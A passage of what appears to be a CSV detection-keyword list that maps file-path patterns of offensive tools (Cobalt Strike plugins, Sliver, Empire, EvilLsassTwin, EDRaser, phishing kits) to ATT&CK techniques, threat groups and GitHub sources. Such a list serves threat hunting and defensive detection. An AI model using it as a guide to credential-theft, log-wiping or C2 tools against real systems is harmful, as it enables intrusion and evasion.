- T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/red-team-scripts,1,1,N/A,10,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -*/enumerate/enumerate.py*,offensive_tool_keyword,gato,GitHub Self-Hosted Runner Enumeration and Attack Tool,T1083 - T1087 - T1081,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/praetorian-inc/gato,1,0,N/A,N/A,3,263,24,2023-07-27T15:15:32Z,2023-01-06T15:43:27Z -*/enumeration/azureAd.py*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/enumeration/azureAzService.py*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/enumeration/subdomain.py*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/enumeration/userenum.py*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/epmd-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/eppc-enum-processes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Erebus/*.dll*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*/Erebus/*.exe*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*/Erebus-email.*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*/etc/passwd*/.sudo_as_admin_successful*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*/EternalHushCore.dll*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,1,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*/EternalHushFramework.git*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,1,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*/etumbot.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/etw.cna,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/etw.x64.*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/etw.x86.*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/etw-fuck.cpp*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,1,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*/etw-fuck.exe*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,1,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*/ETWHash/*,offensive_tool_keyword,ETWHash,C# POC to extract NetNTLMv1/v2 hashes from ETW provider,T1556.001,TA0009 ,N/A,N/A,Credential Access,https://github.com/nettitude/ETWHash,1,1,N/A,N/A,3,229,27,2023-05-10T06:45:06Z,2023-04-26T15:53:01Z -*/evasion/evasion.go,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/evasion/windows/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/evasion_linux.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/evasion_windows.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/EventViewerUAC/*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,1,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -*/EventViewerUAC/*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/EventViewerUAC_BOF,1,1,N/A,10,10,130,29,2022-05-06T17:43:05Z,2022-05-02T02:08:52Z -*/EventViewer-UACBypass*,offensive_tool_keyword,EventViewer-UACBypass,RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass,T1078.004 - T1216 - T1068,TA0004 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CsEnox/EventViewer-UACBypass,1,1,N/A,10,2,108,21,2022-04-29T09:42:37Z,2022-04-27T12:56:59Z -*/evil.cpp*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*/evil.dll*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,0,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*/evil_pdf/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/EvilClippy*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/evilclippy.cs*,offensive_tool_keyword,EvilClippy,A cross-platform assistant for creating malicious MS Office documents,T1566.001 - T1059.001 - T1204.002,TA0004 - TA0002,N/A,N/A,Phishing,https://github.com/outflanknl/EvilClippy,1,1,N/A,10,10,1956,381,2022-05-19T23:00:22Z,2019-03-26T12:14:03Z -*/EvilClippy.git*,offensive_tool_keyword,EvilClippy,A cross-platform assistant for creating malicious MS Office documents,T1566.001 - T1059.001 - T1204.002,TA0004 - TA0002,N/A,N/A,Phishing,https://github.com/outflanknl/EvilClippy,1,1,N/A,10,10,1956,381,2022-05-19T23:00:22Z,2019-03-26T12:14:03Z -*/evilginx*,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,1,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -*/evilhost:*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-JBoss.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/EvilLsassTwin/*,offensive_tool_keyword,EvilLsassTwin,attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.,T1003.001 - T1055 - T1093,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access - Defense Evasion,https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin,1,1,N/A,9,1,39,3,2023-09-11T14:03:21Z,2022-09-13T12:42:13Z -*/EvilnoVNC.git*,offensive_tool_keyword,EvilnoVNC,EvilnoVNC is a Ready to go Phishing Platform,T1566 - T1566.001 - T1071 - T1071.001,TA0043 - TA0001,N/A,N/A,Phishing,https://github.com/JoelGMSec/EvilnoVNC,1,1,N/A,9,7,662,118,2023-09-25T10:50:52Z,2022-09-04T10:48:49Z -*/evilqr.git*,offensive_tool_keyword,evilqr,Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice,T1566.002 - T1204.001 - T1192,TA0001 - TA0005,N/A,N/A,Phishing,https://github.com/kgretzky/evilqr,1,1,N/A,N/A,2,152,21,2023-07-05T13:24:44Z,2023-06-20T12:58:09Z -*/evilSignatures.db*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*/EvilTwinServer*,offensive_tool_keyword,EvilLsassTwin,attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.,T1003.001 - T1055 - T1093,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access - Defense Evasion,https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin,1,1,N/A,9,1,39,3,2023-09-11T14:03:21Z,2022-09-13T12:42:13Z -*/EvtMute.git*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*/Example_C2_Profile*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/Example_Payload_Type/*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - 